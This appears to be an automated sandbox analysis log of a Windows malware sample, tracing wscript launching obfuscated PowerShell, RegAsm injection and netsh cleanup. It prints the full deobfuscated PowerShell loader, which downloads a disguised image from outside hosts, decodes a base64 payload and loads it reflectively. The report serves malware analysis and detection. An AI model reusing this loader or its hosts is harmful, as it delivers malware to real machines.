Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: netsh.pdb source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@", "0")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@Z